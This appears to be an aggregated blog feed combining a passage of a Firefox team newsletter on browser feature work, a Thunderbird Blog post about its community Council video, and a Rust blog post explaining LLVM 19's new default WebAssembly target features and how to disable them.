  • ESR115 EOL was extended for Win 7-8.1 and macOS 10.12-10.14 to March 2025. See the firefox-dev post for more details. This doesn’t impact next month’s planned migration to ESR128 for other OSes, however.
  • The topic selection experiment is running! Firefox users in the treatment branch will see a dialog asking if they want to choose specific topics to appear in their story recommendations:

  • There has been a lot of work on various parts of ScotchBonnet for the Address Bar. We will be looking to enable this in Nightly soon, so anyone wanting a sneak peek can toggle browser.urlbar.scotchBonnet.enableOverride to true. Bug reports and feedback are welcome!
  • mconley fixed a bug with the experimental automatic Picture-in-Picture feature that caused a perma-spinner to appear when tearing a tab out.

Friends of the Firefox team

Resolved bugs (excluding employees)

Script to find new contributors from bug list

Volunteers that fixed more than one bug

  • Jonas Jenwald [:Snuffleupagus]

Project Updates

Accessibility

  • :eeejay has landed ARIA Element reflection that allows ARIA relationship attributes to be set in JavaScript by directly referencing target elements. In particular, it will allow setting ARIA relationship attributes to work across Shadow DOM boundaries (with limitations). It is now available behind the pref accessibility.ARIAElementReflection.enabled and is getting ready to be shipped (bug).

DevTools

DevTools Toolbox
  • Julian Descottes fixed an issue where your plugged-in phone might not be detected in about:debugging (#1899330)
  • Alexandre Poirot added a new panel in the Tracer sidebar where we display the DOM event types that were emitted and let you filter them out (#1908615)

Lint, Docs and Workflow

Migration Improvements (read-only)

  • fchasen launched the experiment to encourage Firefox users without a Mozilla account to create one and sync, in order to have a safeguard against sudden hardware failure. We’re already seeing an uptick in accounts being created, and we’re eager for the experiment to conclude to determine which messaging variant had the most impact!
  • For backup, mconley landed some patches to disable backing up various history-related data stores if Firefox is configured to clear history on shutdown. There are also a series of patches in review to regenerate backups when users intentionally delete certain data.
  • mconley is working with the OMC team to develop a new simple messaging surface inside of the AppMenu panel to try some different variants of the “signed out” state for the accounts item at the top of the menu

New Tab Page

  • The thumbs up / thumbs down experiment is also running to let users in the treatment branch express which stories have value for them, and which don’t:

  • The layout variant experiments we mentioned during the last meeting are slated to start running in early October once Firefox 131 goes out the door!
  • Scott and Max are currently working on migrating us from our legacy endpoints for Top Sites and sponsored stories to a more centralized endpoint.
  • Amy and Nathan are working on the “big rectangle” – a new tall card group type that we’ll be experimenting with in a few months once this capability hits release

Picture-in-Picture

Search and Navigation

  • ScotchBonnet updates
    • Contextual Search will now enter a persistent search mode session when you search on a site that provides OpenSearch @ 1893071
    • Daisuke added the ability to access search pages directly with shift-click; this behaviour was introduced after a lot of user feedback on the current one-off bar @ 1915250
    • We now only show persisted search terms for built-in engines, to make sure 3rd-party search engines can’t trick users @ 1918176
    • As well as a large number of more general improvements and bug fixes @ 1913205, 1913200, 1914604, 1917186
  • Drew has made a lot of improvements to Firefox Suggest
    • Integrating Rust exposure suggestions as part of a new experiment framework @ 1915317
    • Allowed Suggest to be enabled in non-Suggest locales @ 1916873
    • Fixed an issue with too few results being shown when Suggest is enabled @ 1916458
    • And various other improvements
  • Mark has landed large refactorings of search tests @ 1912051, 1917955, along with preparations to implement the search engine selector in Rust to share with mobile @ 1914145
  • Mandy also cleaned up some of the stale code left from the search configuration update @ 1916847
  • Marco landed a fix for issues caused by the urlbar moving on mouse focus, which broke double-click @ 1909189

Mozilla ThunderbirdVIDEO: The Thunderbird Council

The Thunderbird Council is an important part of the Thunderbird story, and one of the main reasons we’re still around. In this month’s office hours, we sat down to chat with one of the very first Thunderbird Council members, Patrick Cloke, and one of the newest, Danny Colin, to discuss what this key group does and to offer advice for those thinking about running in future elections.

Next month, we’ll put out a call for questions on social media and on the relevant TopicBox mailing lists for our next Office Hours, which will feature Ryan Sipes, Managing Director of Product at MZLA, and Mark Surman, Executive Director of the Mozilla Foundation!

September Office Hours: The Thunderbird Council

While Thunderbird has been around almost 20 years, the Council hasn’t always been a part of it. In 2012, Mozilla discontinued support for Thunderbird as a product, but our community stepped in. In 2014, core contributors met in Toronto and elected the first Thunderbird Council to guide the project. For many years, the council was responsible for day-to-day operations, including development, budgeting, and hiring. While MZLA now handles those operations, the council has an even more crucial role. In the video, Danny and Patrick explain how the modern-day council works with MZLA and serves as the community’s voice.

Want to know more about what council members do, or who can run for council? Our guests provide honest and encouraging answers to these questions. Basically, if you’re an active contributor who cares about Thunderbird, you might consider running!

Watch, Read, and Get Involved

We’re so grateful to Danny and Patrick for joining us! We hope this video helps explain more about the Thunderbird Council’s role, and even encourages some of you who are active Thunderbird contributors to consider running in the future. And if you’re not an active contributor yet, go to our website to learn how to get involved!

VIDEO (Also on Peertube):

Thunderbird Council Resources:

The post VIDEO: The Thunderbird Council appeared first on The Thunderbird Blog.

The Rust Programming Language BlogWebAssembly targets: change in default target-features

The Rust compiler has recently upgraded to using LLVM 19 and this change accompanies some updates to the default set of target features enabled for WebAssembly targets of the Rust compiler. Beta Rust today, which will become Rust 1.82 on 2024-10-17, reflects all of these changes and can be used for testing.

WebAssembly is an evolving standard where extensions are being added over time through a proposals process. WebAssembly proposals reach maturity, get merged into the specification itself, get implemented in engines, and remain this way for quite some time before producer toolchains (e.g. LLVM) update to enable these sufficiently-mature proposals by default. In LLVM 19 this has happened with the multi-value and reference-types proposals for the LLVM/Rust target features multivalue and reference-types. These are now enabled by default in LLVM, which transitively means that they're enabled by default for Rust as well.

WebAssembly targets for Rust now have improved documentation about WebAssembly proposals and their corresponding target features. This post is going to review these changes and go into depth about what's changing in LLVM.

WebAssembly Proposals and Compiler Target Features

WebAssembly proposals are the formal means by which the WebAssembly standard itself is evolved over time. Most proposals need toolchain integration in one form or another, for example new flags in LLVM or the Rust compiler. The -Ctarget-feature=... mechanism is used to implement this today. This is a signal to LLVM and the Rust compiler which WebAssembly proposals are enabled or disabled.

There is a loose coupling between the name of a proposal (often the name of the github repository of the proposal) and the feature name LLVM/Rust use. For example there is the multi-value proposal but a multivalue feature.
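If you want to see which feature names your toolchain recognizes for a WebAssembly target, rustc can print them (an illustrative invocation, assuming a reasonably recent compiler); individual features are then toggled with -Ctarget-feature=+foo or -Ctarget-feature=-foo, for example via RUSTFLAGS:

$ rustc --print target-features --target wasm32-unknown-unknown
$ RUSTFLAGS="-Ctarget-feature=+multivalue" cargo build --target wasm32-unknown-unknown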

The lifecycle of the implementation of a feature in Rust/LLVM typically looks like:

  1. A new WebAssembly proposal is created in a new repository, for example WebAssembly/foo.
  2. Eventually Rust/LLVM implement the proposal under -Ctarget-feature=+foo
  3. Eventually the upstream proposal is merged into the specification, and WebAssembly/foo becomes an archived repository
  4. Rust/LLVM enable the -Ctarget-feature=+foo feature by default but typically retain the ability to disable it as well.

The reference-types and multivalue target features in Rust are at step (4) here now and this post is explaining the consequences of doing so.

Enabling Reference Types by Default

The reference-types proposal to WebAssembly introduced a few new concepts to WebAssembly, notably the externref type which is a host-defined GC resource that WebAssembly cannot access but can pass around. Rust does not have support for the WebAssembly externref type and LLVM 19 does not change that. WebAssembly modules produced from Rust will continue to not use the externref type nor have a means of being able to do so. This may be enabled in the future (e.g. a hypothetical core::arch::wasm32::Externref type or similar), but it will most likely only be done on an opt-in basis and will not affect preexisting code by default.

Also included in the reference-types proposal, however, was the ability to have multiple WebAssembly tables in a single module. In the original version of the WebAssembly specification only a single table was allowed and this restriction was relaxed with the reference-types proposal. WebAssembly tables are used by LLVM and Rust to implement indirect function calls. For example function pointers in WebAssembly are actually table indices and indirect function calls are a WebAssembly call_indirect instruction with this table index.
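As a small illustration (not from the original post), a call through a Rust function pointer is exactly the kind of code that lowers to a call_indirect, with the pointer value serving as an index into the module's function table:

// Sketch: an indirect call through a function pointer on a wasm32 target.
// In general this compiles to a `call_indirect` instruction whose operand is
// an index into the module's function table (the optimizer may of course
// devirtualize trivial cases like this one).
fn double(x: i32) -> i32 {
    x * 2
}

fn apply(f: fn(i32) -> i32, x: i32) -> i32 {
    f(x) // indirect call: `call_indirect` in the emitted WebAssembly
}

fn main() {
    assert_eq!(apply(double, 21), 42);
}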

With the reference-types proposal the binary encoding of call_indirect instructions was updated. Prior to the reference-types proposal call_indirect was encoded with a fixed zero byte in its instruction (required to be exactly 0x00). This fixed zero byte was relaxed to a 32-bit LEB to indicate which table the call_indirect instruction was using. For those unfamiliar, LEB is a way of encoding multi-byte integers so that smaller integers take fewer bytes. For example the 32-bit integer 0 can be encoded as 0x00 with a LEB. LEBs additionally allow "overlong" encodings, so the integer 0 can also be encoded as 0x80 0x00.

LLVM's support of separate compilation of source code to a WebAssembly binary means that when an object file is emitted it does not know the final index of the table that is going to be used in the final binary. Before reference-types there was only one option, table 0, so 0x00 was always used when encoding call_indirect instructions. After reference-types, however, LLVM will emit an over-long LEB of the form 0x80 0x80 0x80 0x80 0x00 which is the maximal length of a 32-bit LEB. This LEB is then filled in by the linker with a relocation to the actual table index that is used by the final module.
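To make the encoding concrete, here is a minimal sketch (an illustration, not the actual LLVM or LLD code) of unsigned LEB128 encoding, together with the padded five-byte form that leaves room for the linker to patch in any 32-bit table index later:

// Minimal-length unsigned LEB128: each byte carries 7 bits of the value,
// and the high bit marks "more bytes follow".
fn encode_uleb128(mut value: u32) -> Vec<u8> {
    let mut bytes = Vec::new();
    loop {
        let mut byte = (value & 0x7f) as u8;
        value >>= 7;
        if value != 0 {
            byte |= 0x80; // continuation bit
        }
        bytes.push(byte);
        if value == 0 {
            return bytes;
        }
    }
}

// "Overlong" fixed-width form: always five bytes, so a relocation can later
// overwrite the index without resizing the instruction stream.
fn encode_uleb128_padded5(value: u32) -> [u8; 5] {
    let mut out = [0u8; 5];
    let mut v = value;
    for i in 0..5 {
        let mut byte = (v & 0x7f) as u8;
        v >>= 7;
        if i < 4 {
            byte |= 0x80; // force continuation on all but the final byte
        }
        out[i] = byte;
    }
    out
}

fn main() {
    assert_eq!(encode_uleb128(0), vec![0x00]);
    assert_eq!(encode_uleb128_padded5(0), [0x80, 0x80, 0x80, 0x80, 0x00]);
}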

When putting all of this together, it means that with LLVM 19, which has the reference-types feature enabled by default, any WebAssembly module with an indirect function call (which is almost always the case for Rust code) will produce a WebAssembly binary that cannot be decoded by engines and tooling that do not support the reference-types proposal. It is expected that this change will have a low impact due to the age of the reference-types proposal and breadth of implementation in engines. Given the multitude of WebAssembly engines, however, it's recommended that any WebAssembly users test out Rust 1.82 beta and see if the produced module still runs on their engine of choice.

LLVM, Rust, and Multiple Tables

One interesting point worth mentioning is that despite the reference-types proposal enabling multiple tables in WebAssembly modules, this is not actually taken advantage of at this time by either LLVM or Rust. WebAssembly modules emitted will still have at most one table of functions. This means that the over-long 5-byte encoding of index 0 as 0x80 0x80 0x80 0x80 0x00 is not actually necessary at this time. LLD, LLVM's linker for WebAssembly, wants to process all LEB relocations in a similar manner, which currently forces this 5-byte encoding of zero. For example when a function calls another function the call instruction encodes the target function index as a 5-byte LEB which is filled in by the linker. There is quite often more than one function so the 5-byte encoding enables all possible function indices to be encoded.

In the future LLVM might start using multiple tables as well. For example LLVM may have a mode in the future where there's a table per function type instead of a single heterogeneous table. This can enable engines to implement call_indirect more efficiently. This is not implemented at this time, however.

For users who want a minimally-sized WebAssembly module (e.g. if you're in a web context and sending bytes over the wire) it's recommended to use an optimization tool such as wasm-opt to shrink the size of the output of LLVM. Even before this change with reference-types it's recommended to do this as wasm-opt can typically optimize LLVM's default output even further. When optimizing a module through wasm-opt these 5-byte encodings of index 0 are all shrunk to a single byte.
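A typical invocation might look like the following (assuming Binaryen's wasm-opt is installed; the input path is illustrative, and -Oz optimizes aggressively for size):

$ wasm-opt -Oz target/wasm32-unknown-unknown/release/my_module.wasm -o my_module.opt.wasm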

Enabling Multi-Value by Default

The second feature enabled by default in LLVM 19 is multivalue. The multi-value proposal to WebAssembly enables functions to have more than one return value, for example. WebAssembly instructions are additionally allowed to have more than one return value as well. This proposal is one of the first to get merged into the WebAssembly specification after the original MVP and has been implemented in many engines for quite some time.

The consequences of enabling this feature by default in LLVM are more minor for Rust, however, than enabling the reference-types feature by default. LLVM's default C ABI for WebAssembly code is not changing even when multivalue is enabled. Additionally Rust's extern "C" ABI for WebAssembly is not changing either and continues to match LLVM's (or strives to, differences to LLVM are considered bugs to fix). Despite this though the change has the possibility of still affecting Rust users.

Rust for some time has supported an extern "wasm" ABI on Nightly which was an experimental means of exposing the ability of defining a function in Rust which returned multiple values (e.g. used the multi-value proposal). Due to infrastructural changes and refactorings in LLVM itself this feature of Rust has been removed and is no longer supported on Nightly at all. As a result there is no longer any possible method of writing a function in Rust that returns multiple values at the WebAssembly function type level.

In summary, this change is expected to not affect any Rust code in the wild unless you were using the Nightly extern "wasm" feature, in which case you'll be forced to drop support for that and use extern "C" instead. Supporting WebAssembly multi-return functions in Rust is a broader topic than this post can cover, but at this time it's an area that's ripe for contribution from suitably motivated contributors.

Aside: ABI Stability and WebAssembly

While on the topic of ABIs and the multivalue feature it's perhaps worth also going over a bit what ABIs mean for WebAssembly. The current definition of the extern "C" ABI for WebAssembly is documented in the tool-conventions repository and this is what Clang implements for C code as well. LLVM implements enough support for lowering to WebAssembly as well to support all of this. The extern "Rust" ABI is not stable on WebAssembly, as is the case for all Rust targets, and is subject to change over time. There is no reference documentation at this time for what extern "Rust" is on WebAssembly.

The extern "C" ABI, what C code uses by default as well, is difficult to change because stability is often required across different compiler versions. For example WebAssembly code compiled with LLVM 18 might be expected to work with code compiled by LLVM 20. This means that changing the ABI is a daunting task that requires version fields, explicit markers, etc, to help prevent mismatches.

The extern "Rust" ABI, however, is subject to change over time. A great example of this could be that when the multivalue feature is enabled the extern "Rust" ABI could be redefined to use the multiple-return-values that WebAssembly would then support. This would enable much more efficient returns of values larger than 64-bits. Implementing this would require support in LLVM though which is not currently present.

This all means that actually using multiple-returns in functions, or the WebAssembly feature that multivalue enables, is still out on the horizon and not implemented. First LLVM will need to implement complete lowering support to generate WebAssembly functions with multiple returns, and then extern "Rust" can be changed to use this when fully supported. In the yet-further-still future C code might be able to change, but that will take quite some time due to its cross-version-compatibility story.

Enabling Future Proposals to WebAssembly

This is not the first time that a WebAssembly proposal has gone from off-by-default to on-by-default in LLVM, nor will it be the last. For example LLVM already enables the sign-extension proposal by default which MVP WebAssembly did not have. It's expected that in the not-too-distant future the nontrapping-fp-to-int proposal will likely be enabled by default. These changes are currently not made with strict criteria in mind (e.g. N engines must have this implemented for M years), and there may be breakage that happens.

If you're using a WebAssembly engine that does not support the modules emitted by Rust 1.82 beta and LLVM 19 then your options are:

  • Try seeing if the engine you're using has any updates available to it. You might be using an older version which didn't support a feature but a newer version supports the feature.
  • Open an issue to raise awareness that a change is causing breakage. This could either be done on your engine's repository, the Rust repository, or the WebAssembly tool-conventions repository. It's recommended to first search to confirm there isn't already an open issue though.
  • Recompile your code with features disabled, more on this in the next section.

The general assumption behind enabling new features by default is that it's a relatively hassle-free operation for end users while bringing performance benefits for everyone (e.g. nontrapping-fp-to-int will make float-to-int conversions more optimal). If updates end up causing hassle it's best to flag that early on so rollout plans can be adjusted if needed.

Disabling on-by-default WebAssembly proposals

For a variety of reasons you might be motivated to disable on-by-default WebAssembly features: for example maybe your engine is difficult to update or doesn't support a new feature. Disabling on-by-default features is unfortunately not the easiest task. It is notably not sufficient to use -Ctarget-feature=-sign-ext to disable a feature for just your own project's compilation because the Rust standard library, shipped in precompiled form, is still compiled with the feature enabled.

To disable an on-by-default WebAssembly proposal, you currently need to use Cargo's -Zbuild-std feature. For example:

$ export RUSTFLAGS=-Ctarget-cpu=mvp
$ cargo +nightly build -Zbuild-std=panic_abort,std --target wasm32-unknown-unknown

This will recompile the Rust standard library in addition to your own code with the "MVP CPU", which is LLVM's placeholder for having all WebAssembly proposals disabled. This will disable sign-ext, reference-types, multi-value, etc.
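If you would rather disable only specific proposals instead of falling back to the full MVP feature set, the same -Zbuild-std approach can be combined with per-feature flags (a sketch, using the feature names discussed above):

$ export RUSTFLAGS="-Ctarget-feature=-reference-types,-multivalue"
$ cargo +nightly build -Zbuild-std=panic_abort,std --target wasm32-unknown-unknown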